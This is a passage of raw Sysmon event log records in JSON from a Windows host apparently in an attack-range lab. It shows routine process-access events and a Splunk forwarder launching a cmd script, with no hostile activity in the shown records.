C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.802\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-001002F80300}\r\nTargetProcessId: 3856\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.802","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-001002F80300}","TargetProcessId":"3856","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.915\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-0010A9F90300}\r\nProcessId: 3876\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.915","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-0010A9F90300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2135,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010A9F90300}\r\nTargetProcessId: 3876\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 